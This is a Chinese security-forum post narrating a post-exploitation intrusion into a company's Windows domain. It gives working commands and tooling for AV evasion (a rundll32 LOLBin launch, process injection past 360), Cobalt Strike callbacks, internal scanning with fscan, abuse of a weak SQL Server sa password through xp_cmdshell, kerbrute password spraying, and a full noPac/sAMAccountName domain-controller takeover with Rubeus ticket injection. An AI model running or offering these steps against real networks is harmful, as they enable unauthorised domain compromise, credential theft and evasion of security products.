安全矩阵

 找回密码
 立即注册
搜索
查看: 2840|回复: 0

某集团后渗透实战

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2022-1-12 18:40:52 | 显示全部楼层 |阅读模式
原文链接:某集团后渗透实战

前言某集团后渗透,接手的时候就感觉有域,一次利用域的新漏洞攻击排坑之旅,简单分享下思路~
CS上线如图所示,哥斯拉不能执行任何命令,需要绕过

但是有些时候360会禁用cmd,但是像wmic这些命令是可以执行的,这个时候可以利用白名单的方式去上线CS

c:\windows\system32\rundll32.exe c:\windows\system32\url.dll,FileProtocolHandler c:\xx.exe
但是这里的情况是什么命令都不能执行了,所以寻找另外一种方法
这里我猜测它是出网的,利用哥斯拉自带的shellcodeLoader上线到CS,这个模块在实战下还是很好用的

上线到CS上

但是上线到CS之后也不能执行命令,看了一下特权

getprivs或whoami /priv

存在sedebug特权,这里可以直接getsystem提权

这个时候不能直接执行命令,如果存在360,会被提示拦截,解决方法是注入到另一个system权限进程下去执行命令
来了,这样就可以执行命令了

通过ip查询在10段,可能存在大网段,并且及有可能存在域
密码dump导出administrator的密码hash为xxx

隧道代理这里直接上Stowaway,socks5代理上线

信息收集利用hash在本网段先进行碰撞,无碰撞到有价值的东西

继续在本机进行信息收集,端口检测情况

基本上都是在10.10.168网段下,但是肯定能确定是个大网段,针对10段进行存活性探测
​​
使用脚本来进行网段存活扫描,找到了如下存活网段

扫描找到了存活网段后,上fscan进行探测,扫了16段

fscan.exe -h 10.0.0.0/16 -o 16.txt

不出所料,果然有域,探测无zerologon,所以利用最新的sAMAccountName进行攻击,但是该攻击需要一个域内的账号密码,现在手头没有,打算打台域机器,如果没有再去爆破域账号密码
域控IP

10.0.9.10(辅域)10.0.9.9(主域)
针对域控下的网段进行nbtscan扫描

除DC外还存在另一台域机器,而刚好这台域机器存在sqlserver弱密码

sa P@ssw0rd
激活xpcmdshell,利用powershell上线cs

可以看到这台机器在域内,并且是08,可以dump明文密码

先进行密码dump以及进程探测,检查是否域管登录,如果域管登录可以直接注入进程拿域控了

并没有找到域管进程或密码,而且也没有域内的账号密码,这里直接就进行域账号爆破了
利用已经攻陷的域内机器,net user /domain提取所有的用户,保存为user.txt

上传kerbrute,并利用找到的sqlserver密码P@ssw0rd进行喷洒

kerbrute_windows_amd64.exe bruteuser -d xxx user.txt P@ssw0rd --dc 10.0.9.9

成功找到两个用户的密码,接下来利用noPac来进行攻击
noPac攻击我直接利用sam_the_admin脚本是连接拒绝

proxychains4 -q python3 sam_the_admin.py xxx/ricoh@ssw0rd -dc-ip 10.0.9.10 -shell

换了另一个域控尝试,结果如下

这是这个脚本的一个坑,它说漏洞已经打了补丁,其实漏洞是存在的
这里我换了noPac再一次尝试,由于目前域内机器只有一台,且该机器没有.NET4,所以无法执行noPac,这里我给这个机器安装了.NET4,之后就可以运行了

noPac.exe -domain xxx -user spsadmin -pass P@ssw0rd /dc ad03.xxx /mAccount 1234 /mPassword 123456  /service cifs /ptt

导入出现了问题,可能是NET的原因,直接用Rubeus.exe传递即可

execute-assembly C:\Users\costin\Desktop\Rubeus.exe ptt /ticket:doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQsbCV...

导入成功,访问域控

beacon> shell dir \\ad03.xxx\c$

或者后面换成ldap使用mimikatz导出域控hash也可
一键化一键化利用工具https://github.com/Ridter/noPac,这个可以直接拿下域控了,如下图所示,是可以直接成功的

proxychains4 -q python3 noPac.py xxx/ricoh:'P@ssw0rd' -dc-ip 10.0.9.10 -dc-host ad03 -shell --impersonate administrator -use-ldap

总结实战中sam_the_admin拉跨了,说漏洞已经打过补丁了,误报是有的,另外noPac.exe限制还是蛮多的,需要域内的机器以及.NET4以上的环境,这个内网的其实还有很多坑没写出来,加固了很多地方。值得一提的是,这个域控存在360主动防御以及安全狗和defender


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 23:05 , Processed in 0.016751 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表